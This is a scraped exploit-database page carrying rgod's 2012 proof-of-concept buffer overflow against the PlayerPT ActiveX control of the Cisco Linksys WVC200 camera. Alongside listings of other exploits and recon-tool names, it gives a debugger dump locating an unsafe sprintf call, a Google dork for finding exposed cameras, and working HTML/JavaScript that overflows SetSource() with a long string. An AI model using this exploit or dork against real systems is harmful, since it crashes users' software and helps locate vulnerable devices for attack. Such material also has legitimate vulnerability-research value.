"Cisco Linksys WVC200 Wireless-G PTZ Internet Video Camera PlayerPT - ActiveX Control PlayerPT.ocx sprintf Buffer Overflow (PoC)"

Author

Exploit author

rgod

Platform

Exploit platform

windows

Release date

Exploit published date

2012-03-22

                
                    
                         Download file
                    
                
            
<!--
Cisco Linksys WVC200 Wireless-G PTZ Internet Video Camera PlayerPT ActiveX 
Control PlayerPT.ocx sprintf Buffer Overflow Vulnerability

when viewing the device web interface it asks
to install an ActiveX control with the following settings:

ProductName: PlayerPT ActiveX Control Module
File version: 1.0.0.15
Binary path: C:\WINDOWS\system32\PlayerPT.ocx
CLSID: {9E065E4A-BD9D-4547-8F90-985DC62A5591}
ProgID: PLAYERPT.PlayerPTCtrl.1
Safe for scripting (registry): True
Safe for initialization (registry): True

try this google dork for WVC200:
linksys wireless-g ptz inurl:main.cgi

Vulnerability:
the SetSource() method is vulnerable to a buffer overflow
vulnerability. Quickly, ollydbg dump:

...
03238225   8B5424 20        mov edx,dword ptr ss:[esp+20]
03238229   894424 10        mov dword ptr ss:[esp+10],eax
0323822D   B9 32000000      mov ecx,32
03238232   33C0             xor eax,eax
03238234   8B72 F8          mov esi,dword ptr ds:[edx-8]
03238237   8DBC24 E8020000  lea edi,dword ptr ss:[esp+2E8]
0323823E   F3:AB            rep stos dword ptr es:[edi]
03238240   8B3D 0C062603    mov edi,dword ptr ds:[<&MSVCRT.sprintf>] ; msvcrt.sprintf
03238246   52               push edx
03238247   8D8C24 EC020000  lea ecx,dword ptr ss:[esp+2EC]
0323824E   68 48612603      push PlayerPT.03266148                   ; ASCII "%s"
03238253   51               push ecx
03238254   FFD7             call edi <---------------boom
...

rgod
-->
<!-- saved from url=(0014)about:internet --> 
<HTML>
<object classid='clsid:9E065E4A-BD9D-4547-8F90-985DC62A5591' id='obj' />
</object>
<script>
var x="";
for (i=0; i<13999; i++){
    x = x + "aaaa";
}
obj.SetSource("","","","",x);
</script>

Release Date	Title	Type	Platform	Author
2020-12-02	"aSc TimeTables 2021.6.2 - Denial of Service (PoC)"	local	windows	"Ismael Nava"
2020-12-02	"Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality"	webapps	php	"Mufaddal Masalawala"
2020-12-02	"Ksix Zigbee Devices - Playback Protection Bypass (PoC)"	remote	multiple	"Alejandro Vazquez Vazquez"
2020-12-02	"Mitel mitel-cs018 - Call Data Information Disclosure"	remote	linux	"Andrea Intilangelo"
2020-12-02	"Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile"	webapps	multiple	"Shahrukh Iqbal Mirza"
2020-12-02	"ChurchCRM 4.2.0 - CSV/Formula Injection"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"DotCMS 20.11 - Stored Cross-Site Scripting"	webapps	multiple	"Hardik Solanki"
2020-12-02	"ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"NewsLister - Authenticated Persistent Cross-Site Scripting"	webapps	multiple	"Emre Aslan"
2020-12-02	"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path"	local	windows	"Manuel Alvarez"

Release Date	Title	Type	Platform	Author
2020-12-02	"aSc TimeTables 2021.6.2 - Denial of Service (PoC)"	local	windows	"Ismael Nava"
2020-12-02	"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path"	local	windows	"Manuel Alvarez"
2020-12-02	"PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS"	webapps	windows	"Amin Rawah"
2020-12-02	"Microsoft Windows - Win32k Elevation of Privilege"	local	windows	nu11secur1ty
2020-12-01	"Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path"	local	windows	"Emmanuel Lujan"
2020-12-01	"Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path"	local	windows	Jok3r
2020-12-01	"Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path"	local	windows	"Metin Yunus Kandemir"
2020-12-01	"10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)"	local	windows	Sectechs
2020-12-01	"EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path"	local	windows	SamAlucard
2020-11-30	"YATinyWinFTP - Denial of Service (PoC)"	remote	windows	strider

Release Date	Title	Type	Platform	Author
2013-12-11	"EMC Data Protection Advisor DPA Illuminator - EJBInvokerServlet Remote Code Execution"	remote	windows	rgod
2013-10-04	"Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object - Remote Code Execution"	remote	php	rgod
2013-05-26	"SIEMENS Solid Edge ST4/ST5 SEListCtrlX - ActiveX SetItemReadOnly Arbitrary Memory Rewrite Remote Code Execution"	dos	windows	rgod
2013-05-26	"SIEMENS Solid Edge ST4/ST5 WebPartHelper - ActiveX RFMSsvs!JShellExecuteEx Remote Code Execution"	remote	windows	rgod
2013-01-07	"Foxit Reader 5.4.4.1128 Firefox Plugin - 'npFoxitReaderPlugin.dll' Stack Buffer Overflow (PoC)"	dos	windows	rgod
2012-11-15	"Novell NetIQ Privileged User Manager 2.3.1 - 'ldapagnt.dll' ldapagnt_eval() Perl Code Evaluation Remote Code Execution"	remote	windows	rgod
2012-11-15	"Novell NetIQ Privileged User Manager 2.3.1 - 'auth.dll' pa_modify_accounts() Remote Code Execution"	remote	windows	rgod
2012-08-07	"Oracle Business Transaction Management Server 12.1.0.2.7 - FlashTunnelService WriteToFile Message Remote Code Execution"	remote	windows	rgod
2012-08-07	"Oracle Business Transaction Management Server 12.1.0.2.7 FlashTunnelService - Remote File Deletion"	remote	windows	rgod
2012-08-06	"AOL Products downloadUpdater2 Plugin - 'SRC' Remote Code Execution"	dos	windows	rgod
2012-05-11	"Adobe Photoshop CS5.1 - U3D.8BI Collada Asset Elements Stack Overflow"	local	windows	rgod
2012-04-30	"McAfee Virtual Technician 6.3.0.1911 MVT.MVTControl.6300 - ActiveX 'GetObject()' Code Execution"	remote	windows	rgod
2012-04-05	"Quest vWorkspace 7.5 Connection Broker Client - ActiveX Control 'pnllmcli.dll 7.5.304.547' SaveMiniLaunchFile() Method Remote File Creation / Overwrite"	remote	windows	rgod
2012-04-05	"Quest Toad for Oracle Explain Plan Display ActiveX Control - 'QExplain2.dll 6.6.1.1115' Remote File Creation / Overwrite"	remote	windows	rgod
2012-03-28	"Quest InTrust 10.4.x - ReportTree / SimpleTree Classes"	remote	windows	rgod
2012-03-28	"TRENDnet SecurView TV-IP121WN Wireless Internet Camera - UltraMJCam ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow"	remote	hardware	rgod
2012-03-28	"Quest InTrust 10.4.x - Annotation Objects ActiveX Control 'AnnotateX.dll' Uninitialized Pointer Remote Code Execution"	remote	windows	rgod
2012-03-28	"D-Link DCS-5605 Network Surveillance - ActiveX Control 'DcsCliCtrl.dll' lstrcpyW Remote Buffer Overflow"	remote	hardware	rgod
2012-03-22	"Google Talk - 'gtalk://' Deprecated URI Handler Injection"	remote	windows	rgod
2012-03-22	"Cisco Linksys WVC200 Wireless-G PTZ Internet Video Camera PlayerPT - ActiveX Control PlayerPT.ocx sprintf Buffer Overflow (PoC)"	dos	windows	rgod
2012-03-19	"LANDesk Lenovo ThinkManagement Suite 9.0.3 Core Server - Arbitrary File Deletion"	remote	windows	rgod
2012-03-19	"ManageEngine DeviceExpert 5.6 Java Server ScheduleResultViewer servlet - Directory Traversal"	webapps	jsp	rgod
2012-03-19	"LANDesk Lenovo ThinkManagement Suite 9.0.3 - Core Server Remote Code Execution"	remote	windows	rgod
2012-03-19	"Dell Webcam Software Bundled - ActiveX Remote Buffer Overflow"	remote	windows	rgod
2012-03-19	"2X Client for RDP 10.1.1204 - ClientSystem Class ActiveX Control Download and Execute"	remote	windows	rgod
2012-03-19	"2X ApplicationServer 10.1 - TuxSystem Class ActiveX Control Remote File Overwrite"	remote	windows	rgod
2011-11-07	"Oracle Hyperion Strategic Finance 12.x - Tidestone Formula One WorkBook OLE Control TTF16.ocx Remote Heap Overflow"	remote	windows	rgod
2011-11-02	"Oracle Hyperion Financial Management TList6 - ActiveX Control Remote Code Execution"	remote	windows	rgod
2011-10-31	"Oracle DataDirect ODBC Drivers - HOST Attribute 'arsqls24.dll' Stack Buffer Overflow (PoC)"	dos	windows	rgod
2011-10-24	"Oracle AutoVue 20.0.1 - 'AutoVueX.ocx' ActiveX Control 'ExportEdaBom()' Insecure Method"	remote	windows	rgod

import requests

response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher	Protocols	Sigalg	Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host	WAF detected

Whatweb

Dns lookup

Raccoon scanner

Cmseek

WAF detector

DNS reconnaince

Bing IP2Host

Wappalyzer

Waybackurl

HostHunter

WPScan

Apache Users

CORS Scanner

API Docs

ReDoc

OpenAPI

Swagger

Search for hundreds of thousands of exploits

"Cisco Linksys WVC200 Wireless-G PTZ Internet Video Camera PlayerPT - ActiveX Control PlayerPT.ocx sprintf Buffer Overflow (PoC)"

Download file

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.